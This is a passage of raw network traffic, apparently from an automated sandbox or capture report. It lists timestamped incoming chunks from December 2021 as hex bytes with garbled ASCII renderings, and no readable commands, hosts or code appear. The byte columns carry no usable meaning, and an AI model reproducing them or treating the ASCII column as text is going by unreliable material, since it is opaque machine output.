                                                                                              2021-12-13 23:57:15 UTC4724INData Raw: 7d cc 1d 8e 7b 70 99 6c f0 43 d8 70 14 3a 69 32 b5 85 65 9a 37 36 bc 70 f1 2c f2 2d 6e 56 5b 3b 11 df 14 8b ca 48 ed bb ee 24 63 be 5b 8a b9 56 03 86 48 f2 88 dd 8b ed 5b c9 77 f9 7d cb ff ca 70 b5 c6 ba e6 59 c1 2e 2a 94 a9 fe 83 78 7d f4 8b 14 d4 99 0c 0c 94 fb 69 c4 8c cf 30 3d e8 0f 41 5c 84 d2 5f 72 0a e2 8a 83 1f 9d 55 9d ec 16 ee 9c 00 b4 5c de 5f ef 9a 8d 50 eb cd 28 f0 a4 9f 23 c2 b8 bb 52 91 e4 93 52 be aa 38 86 ec 5e c1 f3 f7 f2 07 57 96 b1 1d d0 b5 5c 9d 39 49 72 4e 17 73 bf 51 bd 2c ea 54 e6 b2 84 57 e2 77 fc db cb a6 bf 2f e9 e3 ef d5 1e 48 62 1a 58 78 dc ec 53 4e 7b 2e f7 d1 b7 98 30 4a 4b 85 8d 3b 83 3a 0d 92 5e 6c de d9 dc cf 44 5b d8 d8 94 60 e8 ca f7 d0 ea 0b 9e 75 8b 41 52 08 06 1e ea e3 31 85 71 c7 66 3c 3c 86 5b e5 5b bf 95 9b fc 2a
                                                                                              Data Ascii: }{plCp:i2e76p,-nV[;H$c[VH[w}pY.*x}i0=A\_rU\_P(#RR8^W\9IrNsQ,TWw/HbXxSN{.0JK;:^lD[`uAR1qf<<[[*
                                                                                              2021-12-13 23:57:15 UTC4725INData Raw: 70 a0 66 96 0a 84 66 0e 01 7a 11 19 14 22 ec 69 05 c8 d1 26 c4 a4 65 80 03 be 9c 21 4a 8c ec 40 e7 40 3d 3d 60 f8 4c a6 1b 11 69 ba 00 66 9d be 59 bc 4a 7c 35 27 92 df 8b 4e 78 f5 fe 5f 56 af 89 7d 6d 6b 04 5a 55 0f 4d f0 20 30 62 0d 0f bd 0a 6f 30 00 c5 1c aa c2 c2 2b 94 9b d5 d6 19 87 6b 81 a5 32 33 ba 19 f5 f3 1e 1a a3 f7 13 3d 6e 96 62 53 91 a7 a2 20 4e 5c 3a 51 cb 75 2b c3 f5 ec d3 d0 d3 4e 02 60 13 43 6c e8 3d 8a 7e 1a f8 d8 8c ef 3a a5 64 58 4d 3c 19 da fb 5d 7c 5e 5d 13 59 9b d7 f9 3c f6 70 d7 d4 0f 90 f4 cb f2 fd ae e7 88 46 55 7b 95 15 0f 39 ca ff ed 4b 48 86 9b f7 e8 10 9a 7b b7 8b 99 c3 18 1b ce 2c 8d 53 e7 5e b3 b7 49 f1 57 26 49 d0 49 16 48 1b 1b 5a 5f 11 69 39 26 0e e7 29 38 5b 71 d2 58 bc 71 b3 d7 68 4c 98 4e f1 e3 31 35 d0 9d 34 aa ee fe
                                                                                              Data Ascii: pffz"i&e!J@@==`LifYJ|5'Nx_V}mkZUM 0bo0+k23=nbS N\:Qu+N`Cl=~:dXM<]|^]Y<pFU{9KH{,S^IW&IIHZ_i9&)8[qXqhLN154
                                                                                              2021-12-13 23:57:15 UTC4741INData Raw: 67 35 fa 4e 05 f5 60 8e 39 08 88 87 d4 18 40 dd e7 b8 39 85 e4 e4 64 5a f1 0f d1 8d f4 b1 a3 8d 5f d7 3b aa 87 43 77 01 e8 8c 9a 2a 1d fa f7 db 11 0a 1f ad ab ef 3d fc 6c 83 76 25 7e 5f 7b 5a 4d c8 38 bc a8 01 35 da 7a c3 69 18 f3 f5 9b b5 c7 0e 34 87 1d d1 57 2e be 2f c0 bf 94 07 88 53 20 07 88 1e 2d db 2e 41 24 d5 3f ee a2 40 b6 1a e3 ab 54 8e 54 2e 7f 25 b8 6e f8 0a d2 ea 93 c1 2e 7c f7 e7 98 77 50 f2 72 06 4d 7f db c1 b9 74 73 61 94 69 4f 9c c1 bd 14 77 6e cd a5 be b4 81 93 73 da 86 61 21 01 0f bb ba fe 54 b6 c5 a2 04 4b 7c e5 8a 0d 53 ee c5 fb 55 fb c5 62 79 09 87 dc 2b 0d f3 e1 87 d2 7b 82 16 af 1e e2 fe 4d bc f4 63 d6 58 c7 8f ee 9b 02 fd ab ac 8e 92 d5 9f c3 49 ed a2 68 c8 af a7 09 a2 6f 77 c5 38 4e 1f 27 6b 87 96 7b c1 71 c2 c4 eb e8 e0 42 a1 c8
                                                                                              Data Ascii: g5N`9@9dZ_;Cw*=lv%~_{ZM85zi4W./S -.A$?@TT.%n.|wPrMtsaiOwnsa!TK|SUby+{McXIhow8N'k{qB
                                                                                              2021-12-13 23:57:15 UTC4742INData Raw: 3d 95 27 d9 a5 d7 cb e9 33 06 ca bb 8e 8e 24 2f cf a8 8e e5 4c a0 f1 de cf 9b 3f 65 6d 6f e5 e4 d7 a6 5b a3 4c ce 70 a4 03 33 6d ca df e0 7b 76 81 8f e1 cf ca 38 a3 a5 8e a3 3c 6b b0 cd fe 92 69 a3 39 67 ce 4b 1e 15 14 75 19 a3 52 b0 a6 f8 d5 1e ec b5 a7 c2 22 30 70 e6 9b 01 cb 92 81 79 37 18 48 b9 35 58 50 13 e4 73 68 cc 05 d5 0a 77 d7 e9 2b 58 eb b3 98 b7 36 f9 1e 2c 78 b0 c8 11 56 31 98 4e 2a 23 98 34 7d 3e ed 0a 07 ed 44 e8 d3 52 5e b6 ac dd 99 29 d1 1f fe 9b 4b 29 af df 39 15 35 87 a1 00 46 6d b9 c5 37 19 62 7c c6 d7 d6 0e 5f 2c db c2 72 70 eb a0 25 30 3a 41 00 52 6d 30 4d 6a 4c ec 6e 67 66 e7 87 e2 26 11 3b b1 7e b6 ab 64 16 1b 3e 65 12 88 10 61 3b 30 48 3e e9 90 4b 8d 60 a6 c7 cb 17 a3 ef 74 ca d1 e5 66 7a d6 e7 66 68 3f 76 04 d2 18 9a 41 db 91 4a
                                                                                              Data Ascii: ='3$/L?emo[Lp3m{v8<ki9gKuR"0py7H5XPshw+X6,xV1N*#4}>DR^)K)95Fm7b|_,rp%0:ARm0MjLngf&;~d>ea;0H>K`tfzfh?vAJ
                                                                                              2021-12-13 23:57:15 UTC4758INData Raw: ca 93 37 34 ce 79 06 69 54 c9 db 4a 97 ec 6a ef 0e 22 65 8a 6b f7 74 a8 ee 1f 0c 2f b7 1a 37 04 0b c2 2e b8 a1 0f e6 12 cf 36 84 d1 51 06 73 ac b0 96 95 d4 76 ae 2f 18 57 41 5d a0 85 ea 61 a9 9a 36 79 7e 38 16 00 e2 0a d2 46 f5 9c a0 72 88 59 0f 31 e9 a6 36 17 18 dd 3c d2 11 2c ce 26 a1 f5 89 a4 fe 6c 48 b4 1e cd dc f1 ad f5 97 fc b2 b3 66 99 2e 17 8a ee c5 f0 31 05 a5 86 04 9d c8 e2 19 f8 ad 51 e5 81 3a 35 39 31 d5 e0 d8 38 93 24 02 ab bc ce f3 3e 15 96 4f fe 90 d0 55 55 9b 43 de f4 d7 78 15 10 65 e5 5b f0 eb 40 c4 32 e8 67 21 1f 67 84 e1 2f b7 35 2f d2 5f a9 f2 6e 60 53 c2 07 06 f6 9c 62 87 b7 14 95 ad b5 55 4c b0 4c 8a 49 c1 8a 3f c1 9f 34 54 5d 89 d6 d0 07 a4 54 58 30 ec 94 9c 68 da b4 4a 38 dc 5b 33 6e 6d 1c a8 fa 64 59 f6 d6 2c 12 f2 68 5e f7 49 ab
                                                                                              Data Ascii: 74yiTJj"ekt/7.6Qsv/WA]a6y~8FrY16<,&lHf.1Q:5918$>OUUCxe[@2g!g/5/_n`SbULLI?4T]TX0hJ8[3nmdY,h^I
                                                                                              2021-12-13 23:57:15 UTC4759INData Raw: 88 8f 8f 24 8e 4f 59 83 68 6c 21 42 7c 52 61 72 95 74 9d 57 5e 37 ed cb 5e a3 32 10 f0 81 1a 1d 58 7c d5 ed 63 3e aa fd cd 14 c4 c5 4c 72 27 d8 79 2c 66 2c 0a 63 a3 72 ef 21 3f 67 ac 44 bc a9 f6 80 80 43 71 6c d5 0f ad 6f c0 7c 0e 9b 04 6b 75 25 58 b3 27 5b d1 a1 16 5e 1f 4d 50 f1 c4 dc 03 06 da 7d d0 6a 92 63 28 b2 a2 97 90 b6 aa 19 16 f9 bc 8e aa 56 99 a3 46 b3 88 c0 ee d7 42 91 16 92 eb e8 be 3f 85 40 d4 bd d7 87 47 6f 78 b2 12 ec 8b 6e 4c 36 4e 60 d3 a4 af a3 3f 8d 57 9f 41 c8 dc c3 d1 0d 31 fa fe b7 c8 93 54 4f 73 a7 92 d4 8a a0 73 80 9b c3 a5 39 5f d6 06 78 5d 4c 03 d4 c7 e0 5c 86 24 e0 74 9d b4 ff 38 dd 73 c8 3b e7 cb 44 84 08 c6 af 41 15 64 14 4d 65 d8 dc 78 47 af c1 d2 a7 65 45 e0 59 8c bb f9 17 b5 cf e8 c4 69 ef 82 d6 2c da 41 fc f4 49 7e 45 22
                                                                                              Data Ascii: $OYhl!B|RartW^7^2X|c>Lr'y,f,cr!?gDCqlo|ku%X'[^MP}jc(VFB?@GoxnL6N`?WA1TOss9_x]L\$t8s;DAdMexGeEYi,AI~E"
                                                                                              2021-12-13 23:57:15 UTC4775INData Raw: c0 c3 c7 f1 ac 1b c4 62 b8 91 80 d8 2a 43 04 d0 24 59 b3 77 8c 29 16 aa d0 63 3b 2d 00 83 17 c0 34 0c a6 fe 5d cf 32 c9 9f 7d e1 34 c3 bd 26 ea 28 3c 61 b9 b7 d2 45 d0 d8 a5 50 74 15 b0 cc 3e f7 03 85 5e 4a 2f 98 5b 95 c0 74 c6 1c 5e ad 48 5a 5d bb 69 81 3f 48 db 9a 2f a3 2d 9b 08 43 2d 65 6e 5a 47 3a 01 f2 44 59 38 23 5e e4 cb 37 ed 77 bb a5 1e 71 31 34 7e e5 69 cb 88 40 47 22 1b 6f 69 c7 44 ab 1c 5d d8 c4 ad 74 6f 6a 99 b7 12 f0 f3 91 51 11 02 e8 e7 2d 23 e7 15 29 ee 69 74 b0 f6 49 fa 59 58 d5 74 5d b7 1c 77 31 8e 7f 06 09 9f be 8d b1 b4 82 13 8c c2 02 f9 e8 41 ba 76 a0 14 8b 10 67 fe 74 93 b9 c1 17 53 e3 9c 9b b6 fe 69 b7 13 68 34 3c 7a 48 78 61 b8 38 8a a1 3e e2 88 c5 53 6e 92 37 24 05 a2 83 4d 02 ab 96 86 c1 09 08 85 5e fa b3 af 3f 56 24 a2 13 ca 86
                                                                                              Data Ascii: b*C$Yw)c;-4]2}4&(<aEPt>^J/[t^HZ]i?H/-C-enZG:DY8#^7wq14~i@G"oiD]tojQ-#)itIYXt]w1AvgtSih4<zHxa8>Sn7$M^?V$
                                                                                              2021-12-13 23:57:15 UTC4776INData Raw: 13 b8 2c 35 ec 05 82 43 9e 3d e1 ad 18 cb a6 d5 8d 90 54 f8 fc cf 55 66 03 81 74 be 96 33 7f 96 a7 6c e9 a6 1b 57 ec 96 a3 75 49 b3 2e 4b d7 73 38 57 21 05 f2 a7 ac 5d 56 1f f6 52 c6 61 0b bc a7 fb a0 b0 d7 d3 b6 0b e6 5c fc 27 9e f3 94 a3 9e 69 ad 84 34 9e c1 65 23 3f 43 7b 34 9c 82 4c 34 b9 d3 93 99 53 e4 96 cf 9e 11 50 cf cb 16 43 f0 bf 5c 87 13 89 ac c5 9c c7 9e c2 ed 6f 53 10 2a 79 69 0a 6d 68 cc 35 22 31 d0 2f 39 f0 3a 18 aa 45 03 ff 13 0d 33 46 72 f0 cc 41 e9 93 aa db 03 9f f7 45 ed 69 85 cc 61 d9 b2 1b 5d 95 c9 06 1a 08 d8 96 e5 2c ca 77 04 95 5f 09 cb 72 d4 58 f2 5a fc 72 cf 86 19 8b 6b 21 af 87 69 d4 94 34 98 4f 64 66 88 71 41 05 de 0d ef d9 55 27 1c 5b f6 b1 a2 90 e1 b6 2f 74 16 0b f2 fa a3 d4 37 92 a3 8f 1f e6 bf 4b ab 1e 3d 7a 2d 26 9b 3c 21
                                                                                              Data Ascii: ,5C=TUft3lWuI.Ks8W!]VRa\'i4e#?C{4L4SPC\oS*yimh5"1/9:E3FrAEia],w_rXZrk!i4OdfqAU'[/t7K=z-&<!
                                                                                              2021-12-13 23:57:15 UTC4792INData Raw: 00 39 ba cf 7a e4 3f 05 d9 06 df b5 46 45 c0 86 f8 ac 8d e6 78 4b 03 b3 e0 cf c6 45 80 41 6d 0e be de 0e fe c8 8f ee f5 13 d9 7f a1 d0 37 cb 90 e4 de 1c ec d3 bc d7 fc d2 f6 1a 0a 8a e0 e1 95 0a 3a b0 93 be 0b c9 19 b8 d4 83 6f b8 ad 33 f8 48 26 4c 22 a2 66 49 6d 29 ad 5e 7a 72 5b e3 70 ac 5d e0 86 96 1f c1 c2 00 c6 82 f2 a8 e7 1a d6 24 17 11 06 7b 27 4b af 6d 78 e4 0e 7b e5 18 3e 1c 01 53 ef 91 9c 54 70 54 a4 6e 53 d7 99 06 5a ab be 84 7b 77 75 e2 cd 07 28 fc 35 44 30 fe e4 3c 7d 14 d0 f8 e7 f6 c0 46 88 89 c0 be 76 b8 6e 19 85 53 8f e4 0d 53 f3 8b 41 36 c5 8c 15 4a 2e dd 45 6f 64 66 51 fd 4b cd 3e 65 85 fc 44 7a 02 85 88 74 fc d4 d0 96 0a 08 7c 42 ef b9 22 04 68 f3 2a 9e 4d 8d a2 f3 1d 61 c0 93 15 02 53 06 34 ab 6b 7d 48 21 ad b3 85 e3 ed ff 9b 83 d9 b7
                                                                                              Data Ascii: 9z?FExKEAm7:o3H&L"fIm)^zr[p]${'Kmx{>STpTnSZ{wu(5D0<}FvnSSA6J.EodfQK>eDzt|B"h*MaS4k}H!
                                                                                              2021-12-13 23:57:15 UTC4793INData Raw: 3f d4 3c 1e cc b1 f5 d0 da 16 fb 39 e7 97 78 a9 7c 3a 91 47 bb 8c d0 e7 d2 b7 47 ad 38 8f 66 8d 7c 8a 42 85 e5 2b 2b 0d b4 f1 c5 3f 07 c6 5f de 34 47 f1 00 86 65 34 76 93 0e 22 39 0b 9f 74 f8 e8 8c e3 9f 08 4e 10 c1 ef 85 67 91 23 68 81 36 6d 68 8b bd 53 e0 e4 77 8e d4 f6 69 d9 b7 f1 53 67 fa 2a 15 0a aa a9 8c b6 9a be bb 2b 81 a6 82 d3 5b 68 5d 91 71 68 c1 5d b9 65 b7 47 2c 74 d1 ed 59 5e ad 7a 32 16 fe b1 85 36 49 fe 7d c6 f7 b3 fe 6b d3 43 e4 ab 09 00 2f 33 8a e0 d7 ef 10 18 4b 31 bc 01 2d 38 48 f4 e6 43 5e e4 b4 da 38 3c 5d 15 ed 91 fc a6 1c de 9c 4c 0c 2d e1 8b 0f 3b 44 72 03 1c 76 14 5d 91 3c 39 7e d7 ca 74 cc de 68 dd a6 16 be c8 f4 1a b2 1d 13 18 04 be a4 10 b4 e4 7d 89 13 21 63 5f ef 77 7f a1 1e 57 8c 82 a5 0a 84 ee 22 1c 78 3f 1a f3 a2 45 c1 c4
                                                                                              Data Ascii: ?<9x|:GG8f|B++?_4Ge4v"9tNg#h6mhSwiSg*+[h]qh]eG,tY^z26I}kC/3K1-8HC^8<]L-;Drv]<9~th}!c_wW"x?E
                                                                                              2021-12-13 23:57:15 UTC4809INData Raw: 4c af 67 e9 19 c6 92 1c 22 d0 d9 6a 51 5e da b2 7d 97 94 1f 36 82 16 f9 ff e2 a4 b9 60 08 17 e1 e8 85 2f 4f 0d 25 4e f4 be 1b 6f 99 76 e3 b7 f5 e9 a2 f3 74 ed 8f 0c ef a8 11 66 b7 6f 0c b0 81 42 b2 ad 80 e1 bf 0e 32 c4 3b f0 44 7e 46 af 17 9b fb da d6 4b f5 55 cb 71 49 b2 21 5a b5 2c c2 43 52 a1 45 20 e0 fe 62 50 6a b5 1d 30 1a c5 d8 6d 5e f4 16 ad 76 5a a6 5b 24 0d 5f 4f ef 7a 14 05 91 4d 75 a4 57 7f 5b 90 18 61 35 2e 07 67 20 f1 cf f9 e2 cd 2f ba 36 5c ef d7 ef dd c8 84 84 a4 86 e7 20 86 1a 02 90 21 72 60 0f 44 d5 66 9e 4f 77 01 58 61 9a 10 d8 5d db ce 07 12 fd 9a 36 3e ca 60 40 79 75 c1 57 80 26 0a c4 b0 a9 98 0a 5c 2a 30 cf b9 d5 8a b0 02 6c ac 89 72 cb 5f 15 61 d3 e7 bf 67 e6 85 52 6e b9 f2 f6 22 92 5a e6 63 4c 9d cf 44 a3 2d 11 02 41 06 fb 40 84 e9
                                                                                              Data Ascii: Lg"jQ^}6`/O%NovtfoB2;D~FKUqI!Z,CRE bPj0m^vZ[$_OzMuW[a5.g /6\ !r`DfOwXa]6>`@yuW&\*0lr_agRn"ZcLD-A@
                                                                                              2021-12-13 23:57:15 UTC4810INData Raw: 21 12 9e 27 ae f3 e4 f1 f9 f0 bc 16 0a 25 22 ca c4 22 58 98 0d 91 5a 35 f2 58 66 b8 d0 9c f6 53 28 7c 7e 9d 0e 1d 33 b4 76 c0 c4 42 90 28 87 f0 e4 a2 33 84 04 ea 6c a2 95 be 63 9e 45 da 51 35 98 15 cb 97 ec 9f 50 d7 1e cd 4f 79 0d 0e 2f df 6c 27 27 18 13 1a 7a 9e 3e e5 96 0b 46 06 6b 8b 40 43 80 9b 0a 73 2c 92 cc 7c 1c c1 c5 7e 53 45 34 ee ea f2 15 5a 3d 28 65 76 eb 60 47 e6 29 12 ea 65 e7 f2 32 d7 61 00 c1 2d bb 0c 0f 0a 18 29 09 b7 86 1a 0b 8b 1c 41 7e a5 cf 9c 14 8c 33 a9 6b 73 99 fd 50 82 b3 ca 3c 92 98 8e c8 f5 69 0f 4b 2d 29 08 0d 82 92 3a 1c bf 4a b7 a0 dc 26 9e be 61 90 cd 0c 93 7c 5d 39 f7 fa 50 50 76 a5 42 6d 5a 33 74 6a 1e fc 92 9a 66 8e b3 61 78 60 f8 56 39 05 06 6e 0f d5 35 4c 06 f4 2d ad 36 66 93 e9 f2 47 30 a6 b6 6a 87 ad fb e8 ec dd e4 d9
                                                                                              Data Ascii: !'%""XZ5XfS(|~3vB(3lcEQ5POy/l''z>Fk@Cs,|~SE4Z=(ev`G)e2a-)A~3ksP<iK-):J&a|]9PPvBmZ3tjfax`V9n5L-6fG0j
                                                                                              2021-12-13 23:57:15 UTC4826INData Raw: 5c ce 0a 96 fc 1b 4e 76 09 84 c6 2e 80 c5 fa cc 6d 31 fe 18 37 6d 2a 89 44 46 db 78 6f e2 92 08 4e f8 c8 47 6c d2 29 52 01 0b 11 ec e3 20 1b 1f aa 47 5d 1e 33 ce a2 9a b7 33 b6 83 05 31 fb 37 96 02 f4 e0 7f 31 e9 cc d1 20 26 05 17 f4 b4 85 83 9d fd 2c 76 e9 cf 95 34 c3 0f 47 58 54 32 26 6f 56 52 15 53 5d 51 bf b4 5c 64 a7 2e a4 39 98 ff 92 a3 74 dd 3c 90 89 d4 1e 06 1d 1a b9 21 3f 4e c0 7f f1 55 6e 71 37 9f 91 62 44 71 44 93 28 7d 9e d2 67 0e cb 97 47 45 22 c9 54 d1 40 51 f3 36 fe 6e 09 59 89 7f f9 4f ee 99 fc 95 7c 5e 97 e4 9b 8d ba e3 dc 27 72 3d e4 2c 8a 63 58 3b 23 d0 4f de 2c 7e 35 8b 39 31 df 94 e3 c0 92 56 ed 3e d3 10 22 70 07 20 26 94 da 2d ad 77 83 99 db 1c 14 07 ab c3 1c b7 73 97 70 f3 d6 5f 15 ab d7 52 e4 cd 61 aa 34 e3 1d 20 b0 fe 35 40 95 cb
                                                                                              Data Ascii: \Nv.m17m*DFxoNGl)R G]33171 &,v4GXT2&oVRS]Q\d.9t<!?NUnq7bDqD(}gGE"T@Q6nYO|^'r=,cX;#O,~591V>"p &-wsp_Ra4 5@
                                                                                              2021-12-13 23:57:15 UTC4827INData Raw: 63 47 94 8b 11 cd 11 c6 5d 09 8f 49 9f cc 67 ee ba 44 cc 50 95 82 1e 56 0c f0 35 d1 a9 ba 18 b0 6b 80 d9 2c d7 6c 52 bb bc bc 6a 84 a1 d1 9d 93 fc 12 80 47 76 62 dc 81 29 31 90 78 0a c1 d5 28 86 f9 72 c7 dd 52 40 b6 9f 02 49 35 a2 d5 f8 ac f3 5d de c4 52 66 13 aa 19 49 99 5c 69 cc 3e 26 e3 fa 3e 05 91 8b 00 60 ee af de 78 4b d5 7a c4 32 7e 5e d5 6e 02 27 6f 4c cb 5e 7a a2 28 39 2b fb 19 86 40 22 ed 3d 50 ca e5 f3 a0 2a 9f 9a a4 5c 60 4c 58 28 39 0f 0a 5b 8a 6a 74 cf 30 42 49 e6 b7 ef 4d 25 53 c1 8f 56 aa 29 55 bb ff f4 af 1a 61 09 14 cc ae 37 92 e3 a0 0f 1d 6f 20 35 98 fc 77 06 75 74 2f 96 4a 66 fb 43 e2 14 cb 6f 71 75 42 73 ae a1 57 08 88 c3 55 67 d0 6c 1b 23 09 68 cf 44 1c 27 7e f6 0a 1f 2e 14 ec d2 58 35 89 d4 7f 50 35 4b 0c d6 eb 22 23 74 43 a6 a4 f2
                                                                                              Data Ascii: cG]IgDPV5k,lRjGvb)1x(rR@I5]RfI\i>&>`xKz2~^n'oL^z(9+@"=P*\`LX(9[jt0BIM%SV)Ua7o 5wut/JfCoquBsWUgl#hD'~.X5P5K"#tC
                                                                                              2021-12-13 23:57:15 UTC4843INData Raw: 7a f1 9c b8 bb d7 79 cb d8 3a 2c 30 85 09 3b db a2 45 11 a0 88 6d 58 30 ec d7 ce d9 8e 4a 73 d4 fe 74 57 cc f6 d5 37 dd 91 9b d7 21 55 24 ed 71 4c 03 71 47 70 71 35 fc 3a 10 ff ba b7 de 07 c2 e8 cc 86 0b ab df b8 a8 1a 32 17 7e 2c a2 51 f5 83 e5 c5 46 cf d9 f8 83 00 2c 78 9f 46 45 c5 0f 49 1f 5c 6c 93 7e 5d 8f 4b 46 ad ef f7 b1 fb f9 30 79 7a b0 50 0e 8f 6e 5c 69 d9 63 e4 63 13 19 94 6c 38 0b 27 21 7d 46 54 a7 ee 3c c6 fd 4b 09 d0 c0 0a 42 aa 2f 28 c2 92 89 ee 9c 62 49 89 53 95 51 d9 f5 c7 fa b6 30 7e e4 d9 7d 91 a7 22 24 01 32 ca 02 bf fd 38 0a 9e c7 0f 82 06 4d 32 e0 05 f2 44 d3 c2 2a 05 4a 63 30 d1 57 97 63 98 ad 89 89 a5 8b 42 3d 19 5c 5e 28 a9 fb 04 57 b2 bf 5f 6d 71 9f 42 f4 42 97 6b f1 e0 aa 3e 22 b3 28 c0 21 aa f2 e7 d1 f6 f2 89 ad be 58 d2 64 7f
                                                                                              Data Ascii: zy:,0;EmX0JstW7!U$qLqGpq5:2~,QF,xFEI\l~]KF0yzPn\iccl8'!}FT<KB/(bISQ0~}"$28M2D*Jc0WcB=\^(W_mqBBk>"(!Xd
                                                                                              2021-12-13 23:57:15 UTC4844INData Raw: 2f d9 02 b1 36 7b f7 4f 8f 86 0a 02 c3 d0 fd 14 73 bc 03 a8 fb ff ed 99 6e 81 bf 8c 43 fc a7 24 6f 65 89 69 2e fd 43 78 46 e4 14 bd a3 94 b1 da e3 a1 40 37 77 19 e1 84 6f c7 07 c7 02 d1 76 7c 8b f3 eb b8 70 77 97 11 e0 aa 14 54 88 a2 30 0c 36 f0 ec c9 67 75 aa 99 cc 91 98 e9 40 29 a7 bc 4f f6 10 01 88 57 28 5a 34 5e 39 db 02 01 08 5a 0e 33 78 03 25 0e 75 63 62 e5 14 bb de b5 9a 8d 98 bd 36 7b 9c 6e 10 b2 be 99 5d 3a be c8 34 c2 a1 54 01 66 fb cc a8 9a b5 c2 87 63 17 bb 34 b9 23 c0 0d c9 a4 64 c7 6f 87 ee d2 bc aa c9 f8 c8 b1 bf 7d a8 aa 9c 23 32 24 cd de 8a 6c f6 6d db 50 11 7e e4 99 f4 7e 41 3d cb fe e9 f4 25 40 50 14 b2 05 e8 dc 48 26 d5 ab 40 d8 e4 e3 ec 11 2f 7c eb 9f 9e 84 35 ea ed 86 27 c5 a3 d6 62 77 1f 07 d8 be 1f a3 07 31 ae 1d 3e cc e7 24 68 9e
                                                                                              Data Ascii: /6{OsnC$oei.CxF@7wov|pwT06gu@)OW(Z4^9Z3x%ucb6{n]:4Tfc4#do}#2$lmP~~A=%@PH&@/|5'bw1>$h
                                                                                              2021-12-13 23:57:15 UTC4860INData Raw: 55 36 4d 21 c8 ca cc fb a6 1a d6 01 35 f2 2b 78 c4 16 c1 99 5a 8e 6b 67 64 3a 10 0d f9 84 a5 b0 50 21 5b 8b b3 e9 8f eb b1 c9 31 72 fe 7b 75 ac 30 7b 86 ac 4e 48 24 b7 ea 8b e0 79 06 79 93 e0 b0 5c c3 01 26 34 c1 ca 31 08 b9 f2 72 a5 9e ed 9a 6f 42 63 df 10 bd 94 7e 18 69 8f 75 97 ab 7b 86 b3 cc 55 1e 04 15 a1 3c a4 b7 29 fb e0 c8 13 5b 94 84 5d 8b cf 71 11 5d 03 3c 9a 77 73 8f 18 6c ec cc ae 0c 5a af 36 61 d1 f3 e7 1e 18 07 55 a2 2a 9c fa 53 a3 20 b9 d9 f3 3b d0 2f 9b f8 0c 01 b9 df 5b 0d dd d4 30 be 57 66 f6 0e 3d 89 10 6c 18 47 e7 65 78 eb c7 d9 57 dc ed d3 a7 13 67 29 d2 e5 42 3e c0 8c 4a fa f5 07 a2 cb 79 53 98 ac 5e 1e be 40 e3 17 57 e9 33 4e df 9f d8 89 45 80 45 7e 76 fe cc 12 7a 2c 5e e7 9d f1 d7 58 22 b0 22 b4 7a c7 f9 14 cd 6b dc 94 93 bd 04 55
                                                                                              Data Ascii: U6M!5+xZkgd:P![1r{u0{NH$yy\&41roBc~iu{U<)[]q]<wslZ6aU*S ;/[0Wf=lGexWg)B>JyS^@W3NEE~vz,^X""zkU
                                                                                              2021-12-13 23:57:15 UTC4861INData Raw: 96 1a 90 11 cb 4a 02 80 bd ec 98 98 98 dc e6 22 79 2e 1f 90 c1 c6 18 da ff 3c 5a dc dd 61 93 8c f1 c4 0c 2e b7 06 d1 15 34 d4 fe bb 8c 33 31 e3 59 a1 39 ba 0d cc d4 98 5a 5c 90 63 4e 7d 7e 0e ac fc 48 95 60 18 68 f0 af d7 8d 01 e6 46 a8 f3 28 9a 70 ab fa 27 1e fc b4 46 3f a8 71 3b d6 e0 d9 d4 9f 0d 84 dd 5b f8 cd 8e 6e 54 b2 94 3c 61 aa 46 95 8d 99 11 6f b0 b7 ae 88 26 0a 26 4b 06 ae d0 76 0e 9c 5b 44 91 8c 22 ea 43 ca 33 0e ea 5e b1 9b 6b 9f a0 89 8d 06 47 f7 4c 39 60 26 90 da 0c 53 9d 55 9c cd c2 9b be 07 4f bb 27 4e 2d 50 a9 98 3d 88 da fb 5e ab a8 88 e1 5f d9 f4 c5 11 02 bd f1 42 0e 2d ff 62 47 13 64 b3 33 6d 7c f0 03 3c 68 d8 9b 51 52 82 73 2a fe 1f bb 45 57 ca 02 d9 7f 21 77 ee 38 5d 72 0f 2c a8 f9 ca f4 2e 18 7b 8f 15 18 ab 53 7e 20 76 d1 33 0c bb
                                                                                              Data Ascii: J"y.<Za.431Y9Z\cN}~H`hF(p'F?q;[nT<aFo&&Kv[D"C3^kGL9`&SUO'N-P=^_B-bGd3m|<hQRs*EW!w8]r,.{S~ v3
                                                                                              2021-12-13 23:57:15 UTC4877INData Raw: cd 21 57 5f 35 22 48 c6 63 1e b2 8b f7 59 38 61 98 ab 79 b4 38 42 b6 04 b8 7b a8 a0 59 aa b0 c8 de 60 b1 ee 69 5d f2 da 7b 4e 1b 93 a3 4d 3d f3 b0 f3 b0 a5 d7 d4 2f 83 40 f2 b1 f0 95 44 31 24 67 3a fd b2 00 ac fa b1 70 58 69 63 cf 65 9a 80 9d 30 e0 32 24 fb 23 d2 f6 f3 32 a4 7e 7c 92 09 97 11 35 d8 b4 37 14 06 22 39 d5 59 cf 44 1a 2d 1a 8a 64 18 39 60 bd 11 f5 1e d5 33 d2 20 9c 9a 57 e7 7c dd fc db 8c 79 cf 68 65 e1 d0 70 62 77 93 de 89 6e f9 bb 99 48 2b a5 5e ad 7b 3d 66 87 8f 2a 4e 5d 94 20 0d 03 39 cf 7c d9 76 cf 81 84 d5 5e 9a 14 27 ea 83 bd 26 83 5b 16 5f 03 31 49 e3 89 c0 f1 82 99 f7 0d 7e 00 44 89 d3 6b 6d a9 c5 7c 02 bd 56 b7 69 65 77 8c 40 f4 2e b0 fa f8 0a 0e 28 62 a7 d2 2f 96 b6 ce aa c9 71 29 2a b0 1c 50 de 66 0c 5b 1d 73 b9 0d 93 01 cd f5 02
                                                                                              Data Ascii: !W_5"HcY8ay8B{Y`i]{NM=/@D1$g:pXice02$#2~|57"9YD-d9`3 W|yhepbwnH+^{=f*N] 9|v^'&[_1I~Dkm|View@.(b/q)*Pf[s
                                                                                              2021-12-13 23:57:15 UTC4878INData Raw: de 03 2a 0a 20 c9 97 0d a1 49 3f f1 a4 2c e2 8c e7 df 20 4f 31 d1 15 10 79 a5 8b cc 42 28 5e b9 77 a1 82 7a 21 07 ce 27 41 0d f1 99 0e cc f3 15 c7 5c 77 33 62 81 76 23 e7 dc 55 77 4e f9 4f de 07 b3 f4 eb 51 3e 53 74 ae 35 b9 2c eb ec a9 f9 7d cb 51 b9 8b f8 62 c5 86 44 67 58 c7 53 9d 4f dd 5a 79 0e f5 04 3d 88 c9 d8 4d 07 25 06 46 85 22 f6 1d f1 0a 18 73 af 69 ac 96 17 84 7d dd ff 06 2a f7 cf a0 38 93 b7 48 dc e9 7d 5c ff cc f6 22 a7 57 ff 4d 95 9c f2 d3 e5 2d f5 bc 6f ee d8 ad 24 ff f7 99 dc b9 2c c2 f5 91 71 18 aa 83 07 e7 c0 55 77 e5 2a 4d 8c 7f 